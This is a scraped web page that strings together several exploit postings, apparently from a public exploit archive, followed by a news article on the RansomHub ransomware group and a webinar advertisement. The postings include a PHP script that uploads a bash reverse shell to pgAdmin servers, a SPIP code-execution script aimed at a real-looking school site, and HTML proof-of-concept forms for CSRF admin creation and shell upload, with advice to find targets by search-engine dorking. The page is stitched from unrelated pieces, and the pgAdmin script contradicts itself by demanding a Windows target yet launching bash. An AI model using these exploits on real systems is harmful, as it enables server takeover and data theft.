pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.

    =============================================================================================================================================| # Title     : pgAdmin 8.4 PHP Code Execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.pgadmin.org/download/                                                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.     This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity   of the database management system and the security of the underlying data.  [+] Description:    The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on.    exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.[+] How to use it:    Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine.    Verify that your machine is listening on the specified port using nc or a similar tool:    nc -lvnp YOUR_PORT[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.[+] Line : 156+157        $ip = 'YOUR_IP'; // Replace with your machine's IP        $port = 'YOUR_PORT'; // Replace with the port you want to use[+] Line : 164+165+166           $targetUrl = 'http://target-url.com'; // Replace this with the actual address           $username = 'admin'; // Username (if required)           $password = 'password'; // Password (if required)              [+] Save As poc.php[+] usage : cmd=> php poc.php[+] payload :<?phpclass PGAdminExploit {    private $targetUrl;    private $csrfToken;    private $username;    private $password;    public function __construct($targetUrl, $username = '', $password = '') {        $this->targetUrl = rtrim($targetUrl, '/');        $this->username = $username;        $this->password = $password;    }    public function exploit() {        if ($this->authRequired() && (!$this->username || !$this->password)) {            die("The application requires authentication, please provide valid credentials.\n");        }        if ($this->authRequired()) {            $this->authenticate();            echo "Successfully authenticated to pgAdmin\n";        }        if (!$this->onWindows()) {            die("This exploit is specific to Windows targets!\n");        }        $fileName = 'reverse_shell.php';        $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());    }    private function authRequired() {        $res = $this->sendRequest('GET', $this->targetUrl . '/');        return strpos($res, 'Location: login') !== false;    }    private function onWindows() {        $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js');        if ($res) {            $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';");            return $platform == 'win32';        }        return false;    }    private function authenticate() {        $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login');        $this->setCsrfTokenFromLoginPage($loginPage);        $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [            'csrf_token' => $this->csrfToken,            'email' => $this->username,            'password' => $this->password,            'language' => 'en',            'internal_button' => 'Login'        ]);        if (strpos($res, 'Location: login') !== false) {            die("Failed to authenticate to pgAdmin\n");        }    }    private function setCsrfTokenFromLoginPage($response) {        if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } elseif (preg_match('/<input.*?id="csrf_token".*?value="(.*?)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } else {            die("Failed to obtain the CSRF token\n");        }    }    private function fileManagerUploadAndTrigger($filePath, $fileContents) {        list($transId, $homeFolder) = $this->fileManagerInit();        $formData = [            'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath),            'mode' => 'add',            'currentpath' => $homeFolder,            'storage_folder' => 'my_storage'        ];        $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true);        if (strpos($res, '"success":1') === false) {            die("Failed to upload file contents\n");        }        $uploadPath = $this->getStringBetween($res, '"Name":"', '"');        echo "Payload uploaded to: {$uploadPath}\n";        $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([            'utility_path' => substr($uploadPath, 0, -15)        ]), true);    }    private function fileManagerInit() {        $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([            'dialog_type' => 'storage_dialog',            'supported_types' => ['sql', 'csv', 'json', '*'],            'dialog_title' => 'Storage Manager'        ]));        $transId = $this->getStringBetween($res, '"transId":"', '"');        $homeFolder = $this->getStringBetween($res, '"homedir":"', '"');        if (!$transId || !$homeFolder) {            die("Failed to initialize a file manager transaction Id or home folder\n");        }        return [$transId, $homeFolder];    }    private function sendRequest($method, $url, $data = [], $multipart = false) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            if ($multipart) {                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            } else {                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));            }        }        if ($this->csrfToken) {            curl_setopt($ch, CURLOPT_HTTPHEADER, [                "X-pgA-CSRFToken: {$this->csrfToken}"            ]);        }        $response = curl_exec($ch);        if (curl_errno($ch)) {            die("cURL Error: " . curl_error($ch) . "\n");        }        curl_close($ch);        return $response;    }    private function getStringBetween($string, $start, $end) {        $string = ' ' . $string;        $ini = strpos($string, $start);        if ($ini == 0) return '';        $ini += strlen($start);        $len = strpos($string, $end, $ini) - $ini;        return substr($string, $ini, $len);    }    private function generateReverseShell() {        // حمولة الاتصال العكسي باستخدام Netcat        $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك        $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه        $shell = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/$ip/$port 0>&1'\"); ?>";        return $shell;    }}// مثال على الاستخدام$targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي$username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا)$password = 'password'; // كلمة المرور (إذا كانت مطلوبة)$exploit = new PGAdminExploit($targetUrl, $username, $password);$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

pgAdmin 8.4 Code Execution 

SPIP version 4.2.7 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.7 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.7 Code Execution

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Loan Management System 2024 1.0 Insecure Settings

Hostel Management System version 1.0 version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : hostel management system 1.0 arbitrary file upload Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/hostel-management-system/                                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line : 9 Set your Target[+] Save As poc.html[+] payload :<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Complaint Form</title></head><body>    <form name="complaint" action="https://guardianpg.in/hostel/register-complaint.php" method="POST" enctype="multipart/form-data">        <label for="ctype">Complaint Type:</label>        <select name="ctype" id="ctype">            <option value="type1">Type 1</option>            <option value="type2">Type 2</option>            <option value="type3">Type 3</option>        </select><br><br>        <label for="cdetails">Complaint Details:</label><br>        <textarea name="cdetails" id="cdetails" rows="4" cols="50"></textarea><br><br>        <label for="image">Upload Image:</label>        <input type="file" name="image" id="image"><br><br>        <input type="submit" name="submit" value="Submit Complaint">    </form></body></html>[+] your Files : http://127.0.0.1/Hostel-Management-Syste-Updated-Code/hostel/comnplaintdoc/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Hostel Management System 1.0 Arbitrary File Upload

File Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : File Management System 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 1 : Set your target.[+] Save As poc.html[+] Payload :  <form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">  <div class="modal-dialog" role="document">    <div class="modal-content">      <div class="modal-header text-center">        <h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>        <button type="button" class="close" data-dismiss="modal" aria-label="Close">          <span aria-hidden="true">&times;</span>        </button>      </div>      <div class="modal-body mx-3">           <div class="md-form mb-5">          <input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">        </div>        <div class="md-form mb-5">          <i class="fas fa-user prefix grey-text"></i>          <input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>        </div>        <div class="md-form mb-5">          <i class="fas fa-envelope prefix grey-text"></i>          <input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>        </div>        <div class="md-form mb-4">          <i class="fas fa-lock prefix grey-text"></i>          <input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>        </div>      </div>      <div class="modal-footer d-flex justify-content-center">        <button class="btn btn-info" name="reg">Sign up</button>    Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Management System 1.0 Cross Site Request Forgery

Faculty Evaluation System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Faculty Evaluation System 1.0 CSRF Add Admin Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 35 : Set your target.

[+] Save As poc.html

[+] Payload :

  <!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/eval/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Shell Path : http://127.0.0.1/eval/assets/uploads/

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Faculty Evaluation System 1.0 Cross Site Request Forgery

eClass LMS version 6.2.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : eClass LMS v6.2.0 shell upload Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/eclass-learning-management-system/25613271                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] TAIF learning script contain arbitrary file upload[+] registered user can upload .php files in profile picture section without any security[+] profile link : localhost/demo/public/profile/show/[+] profile link : /demo/public/profile/show/[+] edit profile photo and upload php files and inspect element your php direction[+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id[+] just right click the photo and use inspect element you will have your directionGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

eClass LMS 6.2.0 Shell Upload

Free Hospital Management System for Small Practices version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Vaidya-Mitra v 1.0 CSRF Vulnerability  
                                                                   |  
| # Author    : indoushka  
                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1  
(64 bits)                                                            |  
| # Vendor    :  
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html  
                             |

=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin.

[+] Go to the line 9. Set the target site link Save changes and apply .

[+] infected file : vm/create-account.php.

[+] save code as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width,  
initial-scale=1.0">  
    <title>Create Account</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/vm/create-account.php" method="POST">  
        <label for="newemail">Email:</label>  
        <input type="email" id="newemail" name="newemail" required>  
        <br>

        <label for="tele">Telephone:</label>  
        <input type="text" id="tele" name="tele" required>  
        <br>

        <label for="newpassword">Password:</label>  
        <input type="password" id="newpassword" name="newpassword"  
required>  
        <br>

        <label for="cpassword">Confirm Password:</label>  
        <input type="password" id="cpassword" name="cpassword" required>  
        <br>

        <button type="submit">Create Account</button>  
    </form>  
</body>  
</html>

Greetings to  
:============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr  
|

==========================================================================

Free Hospital Management System For Small Practices 1.0 CSRF

Threat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said.
The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services,

Threat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said.

The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure.

"RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV)," government agencies said.

A ransomware-as-a-service (RaaS) variant that's a descendant of Cyclops and Knight, the e-crime operation has attracted high-profile affiliates from other prominent variants such as LockBit and ALPHV (aka BlackCat) following a recent wave of law enforcement actions.

ZeroFox, in an analysis published late last month, said RansomHub's activity as a proportion of all ransomware activity observed by the cybersecurity vendor is on an upward trajectory, accounting for approximately 2% of all attacks in Q1 2024, 5.1% in Q2, and 14.2% so far in Q3.

"Approximately 34% of RansomHub attacks have targeted organizations in Europe, compared to 25% across the threat landscape," the company noted.

The group is known to employ the double extortion model to exfiltrate data and encrypt systems in order to extort victims, who are urged to contact the operators via a unique .onion URL. Targeted companies who refuse to acquiesce to the ransom demand have their information published on the data leak site for anywhere between three to 90 days.

Initial access to victim environments is facilitated by exploiting known security vulnerabilities in Apache ActiveMQ (CVE-2023-46604), Atlassian Confluence Data Center and Server (CVE-2023-22515), Citrix ADC (CVE-2023-3519), F5 BIG-IP (CVE-2023-46747), Fortinet FortiOS (CVE-2023-27997), and Fortinet FortiClientEMS (CVE-2023-48788) devices, among others.

This step is succeeded by affiliates conducting reconnaissance and network scanning using programs like AngryIPScanner, Nmap, and other living-off-the-land (LotL) methods. RansomHub attacks further involve disarming antivirus software using custom tools to fly under the radar.

"Following initial access, RansomHub affiliates created user accounts for persistence, re-enabled disabled accounts, and used Mimikatz on Windows systems to gather credentials \[T1003\] and escalate privileges to SYSTEM," the U.S. government advisory reads.

"Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP), PsExec, AnyDesk, Connectwise, N-Able, Cobalt Strike, Metasploit, or other widely used command-and-control (C2) methods."

Another notable aspect of RansomHub attacks is the use of intermittent encryption to speed up the process, with data exfiltration observed through tools such as PuTTY, Amazon AWS S3 buckets, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.

The development comes as Palo Alto Networks Unit 42 unpacked the tactics associated with the ShinyHunters ransomware, which it tracks as Bling Libra, highlighting its shift to extorting victims as opposed to their traditional tactic of selling or publishing stolen data. The threat actor first came to light in 2020.

"The group acquires legitimate credentials, sourced from public repositories, to gain initial access to an organization's Amazon Web Services (AWS) environment," security researchers Margaret Zimmermann and Chandni Vaya said.

"While the permissions associated with the compromised credentials limited the impact of the breach, Bling Libra infiltrated the organization's AWS environment and conducted reconnaissance operations. The threat actor group used tools such as the Amazon Simple Storage Service (S3) Browser and WinSCP to gather information on S3 bucket configurations, access S3 objects and delete data."

It also follows a significant evolution in ransomware attacks, which have moved beyond file encryption to employ complex, multi-faceted extortion strategies, even employing triple and quadruple extortion schemes, per SOCRadar.

"Triple extortion ups the ante, threatening additional means of disruption beyond encryption and exfiltration," the company said.

"This might involve conducting a DDoS attack against the victim's systems or extending direct threats to the victim's clients, suppliers, or other associates to wreak further operational and reputational damage on those ultimately targeted in the extortion scheme."

Quadruple extortion ups the ante by contacting third-parties that have business relationships with the victims and extorting them, or threatening victims to expose data from third-parties to heap further pressure on a victim to pay up.

The lucrative nature of RaaS models has fueled a surge in new ransomware variants like Allarich, Cronus, CyberVolk, Datablack, DeathGrip, Hawk Eye, and Insom. It has also led Iranian nation-state actors to collaborate with known groups like NoEscape, RansomHouse, and BlackCat in return for a cut of the illicit proceeds.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

RansomHub Ransomware Group Targets 210 Victims Across Critical Sectors

The world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated.
In this high-stakes game, security leaders need every advantage they can get. That's where Artificial Intelligence (AI) comes in. AI isn't just a buzzword; it's a game-changer for vulnerability management.
AI is poised to revolutionize vulnerability

Vulnerability Management / Webinar

The world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated.

In this high-stakes game, security leaders need every advantage they can get. That's where Artificial Intelligence (AI) comes in. AI isn't just a buzzword; it's a game-changer for vulnerability management.

AI is poised to revolutionize vulnerability management in the coming years. It enables security teams to:

*   **Identify risks at scale:** AI can analyze massive amounts of data to identify vulnerabilities that humans might miss.
*   **Prioritize threats:** AI helps focus on the most critical vulnerabilities, ensuring resources are used effectively.
*   **Remediate faster:** AI automates many tasks, allowing for quicker and more efficient remediation.

AI isn't just about technology; it's about people. This webinar will delve into how security leaders can leverage AI to empower their teams and foster a culture of security. Learn how to turn developers into security advocates and create a proactive security posture throughout your organization.

****Key Takeaways from this Must-Attend Webinar:****

*   **AI Innovations:** Get an in-depth look at how AI is changing the face of vulnerability management.
*   **Expert Analysis:** Understand the real-world impact of AI on identifying, prioritizing, and remediating security risks.
*   **Future Trends:** Gain insights into the trends that will shape the future of AI in vulnerability management, so you can stay ahead of the curve.
*   **High-Velocity Remediation:** Learn how AI can help you keep pace with complex attack surfaces and high volumes of findings.
*   **Scalability Solutions:** Discover AI-driven solutions that enable you to scale your security efforts without sacrificing efficiency.
*   **Process Optimization:** Establish clear processes, ownership, and visibility across multi-team and cross-domain remediation efforts.

Don't miss this opportunity to learn from the best and transform your approach to vulnerability management. The AI revolution is here. Are you ready?

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Latest News